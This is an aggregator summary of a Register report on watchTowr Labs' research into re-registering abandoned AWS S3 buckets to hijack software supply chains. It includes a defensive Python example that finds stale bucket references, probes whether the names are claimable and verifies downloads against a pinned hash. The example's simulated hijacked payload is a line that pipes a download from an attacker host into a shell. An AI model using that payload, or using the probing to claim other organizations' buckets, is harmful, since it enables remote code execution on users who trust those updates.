Source URL: https://www.theregister.com/2025/02/04/abandoned_aws_s3/
Source: The Register
Title: Abandoned AWS S3 buckets can be reused in supply-chain attacks that would make SolarWinds look ‘insignificant’
Feedly Summary: When cloud customers don’t clean up after themselves, part 97
Abandoned AWS S3 buckets could be reused to hijack the global software supply chain in an attack that would make Russia’s “SolarWinds adventures look amateurish and insignificant,” watchTowr Labs security researchers have claimed.…
AI Summary and Description: Yes
Summary: The article highlights a significant security risk associated with abandoned AWS S3 buckets: researchers from watchTowr Labs found that bucket names which had been deleted but were still referenced by live software and websites could be re-created by anyone, because S3 bucket names are global and released on deletion. By re-registering such buckets themselves, they demonstrated that an attacker could serve whatever content those stale references expect, including software updates and configuration. The findings emphasize the need for lifecycle management of cloud resources, and in particular for preventing the reuse of bucket names that still have dependants.
Detailed Description:
The report from watchTowr Labs raises alarms about security vulnerabilities linked to abandoned AWS S3 storage buckets. This situation has far-reaching implications for organizations relying on cloud infrastructure for secure software delivery.
– **Key Findings:**
– Approximately 150 AWS S3 buckets that had been deleted, yet were still referenced by applications and websites, were found; any of those names could be re-created by a third party.
– The buckets had belonged to a range of entities, including government agencies, Fortune 500 companies, and technology organizations.
– The researchers paid to re-register the buckets under their own control and then logged more than eight million requests arriving at them over the observation period, including requests for software binaries, updates, and configuration files.
– Requests originated from networks belonging to, among others, NASA, military organizations, and major financial services firms, which illustrates the reach an attacker would have had with the same bucket names.
– **Security Risks:**
– The underlying problem, abandoned infrastructure that others still trust, is not specific to S3. The report ties the issue to earlier research on expired domains and unmanaged accounts left behind when businesses shut down.
– One cited example is abandoned single sign-on accounts: whoever buys the expired domain can receive password resets and log in as the former employees, gaining unauthorized access.
– **Attack Feasibility:**
– The steps needed to exploit these buckets were described as “terrifyingly simple”: identify a referenced bucket name that no longer exists, create a bucket with that name, and wait for the stale clients to fetch from it.
– Clients should verify the integrity and authenticity of anything fetched from such a URL, for example by checking a pinned hash or a signature, before executing or installing it; this is not universally practiced, and without it a re-created bucket translates directly into code execution on every client that still references it.
– **Industry Implications:**
– The study calls for improved protocols around the management of cloud resources, particularly ensuring buckets can’t be easily reused without audit or restriction.
– AWS has been urged to amend policies to prevent former bucket names from being reused, an approach identified by experts as a straightforward solution to mitigate risks.
– **Future Directions:**
– The findings prompt a reevaluation of security practices regarding abandoned cloud resources, advocating for more robust governance frameworks to prevent future vulnerabilities.
– Industry stakeholders are encouraged to adopt more stringent policies concerning the management of infrastructure lifecycles, especially amid an evolving threat landscape.
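As an added example, not the watchTowr tooling or anything from the article, the following Python shows both halves of the problem described under the key findings and attack feasibility above: it extracts S3 bucket references from a configuration file, classifies a bucket from an unauthenticated probe of its root (does the name still exist, or is it free for anyone to re-create?), and demonstrates the client-side pinned-digest check that makes a hijacked bucket harmless. The bucket names, the sample config, the artifact bytes, and the probe responses used in the demo are all constructed; `probe_bucket()` performs a real network request and is only meant to be run against names your own organization once owned.

```python
"""Added example (not watchTowr's tooling): stale S3 references and the verify-before-accept check.
Part 1 finds bucket names in config text and classifies an unauthenticated probe of the bucket root.
Part 2 shows a client refusing an artifact whose digest does not match a pin shipped with the client.
All bucket names, config text, artifact bytes and probe responses below are constructed.
"""
import hashlib
import hmac
import re
import urllib.error
import urllib.request

# S3 bucket names are 3-63 chars of lowercase letters, digits, dots and hyphens.
_NAME = r"([a-z0-9][a-z0-9.-]{1,61}[a-z0-9])"
# The three URL shapes commonly found in code and config:
# virtual-hosted (bucket.s3[.region].amazonaws.com), path-style (s3[.region].amazonaws.com/bucket), s3:// URIs.
_S3_PATTERNS = (
    re.compile(r"https?://" + _NAME + r"\.s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com"),
    re.compile(r"https?://s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com/" + _NAME),
    re.compile(r"s3://" + _NAME),
)


def find_bucket_references(text: str) -> list[tuple[str, str]]:
    """Return (bucket, matched_url) pairs, first occurrence per bucket, in the order found."""
    seen, found = set(), []
    for pat in _S3_PATTERNS:
        for m in pat.finditer(text):
            if m.group(1) not in seen:
                seen.add(m.group(1))
                found.append((m.group(1), m.group(0)))
    return found


def classify_probe(status: int, body: str = "") -> str:
    """Interpret an unauthenticated GET of https://s3.amazonaws.com/<bucket>/.

    An existing bucket answers 200 (public listing), 403 (private) or 301 (lives in another
    region). Only a bucket that does not exist answers 404 on its root, so 404 means the
    name is claimable. A 404 carrying NoSuchKey is an object miss and proves the bucket exists.
    """
    if status == 404:
        return "exists" if "NoSuchKey" in body else "unclaimed"
    if status in (200, 301, 307, 403):
        return "exists"
    return "unknown"


def probe_bucket(bucket: str, timeout: float = 5.0) -> str:
    """Live probe (needs network). Path-style URLs avoid TLS name mismatches for dotted bucket names."""
    req = urllib.request.Request(f"https://s3.amazonaws.com/{bucket}/", method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_probe(resp.status, resp.read(4096).decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return classify_probe(err.code, err.read(4096).decode("utf-8", "replace"))


# Part 2: the pin travels with the client (or a signed manifest), never with the bucket.
GENUINE_INSTALLER = b"#!/bin/sh\necho 'genuine installer (constructed sample)'\n"
PINNED_SHA256 = hashlib.sha256(GENUINE_INSTALLER).hexdigest()


def accept_artifact(blob: bytes, pinned_sha256: str) -> bool:
    """True only if the fetched bytes hash to the pinned digest (constant-time compare)."""
    return hmac.compare_digest(hashlib.sha256(blob).hexdigest(), pinned_sha256)


def fetch_verified(url: str, pinned_sha256: str, fetcher) -> bytes:
    """fetcher(url) -> bytes is injected so a hijacked bucket can be simulated offline."""
    blob = fetcher(url)
    if not accept_artifact(blob, pinned_sha256):
        raise ValueError(f"digest mismatch for {url}; refusing to install")
    return blob


# Constructed config with one live, one deleted and one relocated bucket, plus a non-S3 host.
SAMPLE_CONFIG = """
update_url = https://acme-updates.s3.us-east-1.amazonaws.com/v2/installer.exe
fallback   = https://s3.amazonaws.com/acme-legacy-builds/installer.exe
log_sink   = s3://acme.telemetry.archive/2024/
docs       = https://docs.example.com/not-an-s3-host
"""
# Constructed probe responses standing in for what probe_bucket() would observe.
FAKE_RESPONSES = {
    "acme-updates": (403, ""),
    "acme-legacy-builds": (404, "<Error><Code>NoSuchBucket</Code></Error>"),
    "acme.telemetry.archive": (301, "<Error><Code>PermanentRedirect</Code></Error>"),
}

if __name__ == "__main__":
    for bucket, url in find_bucket_references(SAMPLE_CONFIG):
        print(f"{bucket:<24} {classify_probe(*FAKE_RESPONSES[bucket]):<10} <- {url}")
    hijacked = lambda _url: b"#!/bin/sh\ncurl https://attacker.invalid/x | sh\n"  # constructed
    try:
        fetch_verified("https://s3.amazonaws.com/acme-legacy-builds/installer.exe", PINNED_SHA256, hijacked)
    except ValueError as err:
        print("blocked:", err)
```

An "unclaimed" result only says the name is free; confirming that a stale client actually fetches from it means creating the bucket, which is what the researchers did and which should be done only for names your own organization previously owned. The digest pin is the minimum control: it is only as good as the channel that delivered the pin, so ship it inside the client or in a signed manifest rather than alongside the artifact.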
This research sheds light on urgent areas for improvement in cloud security practices and emphasizes the necessity of vigilance regarding the lifecycle management of digital infrastructure. Security and compliance professionals must address these risks promptly to protect the integrity of their networks and operations.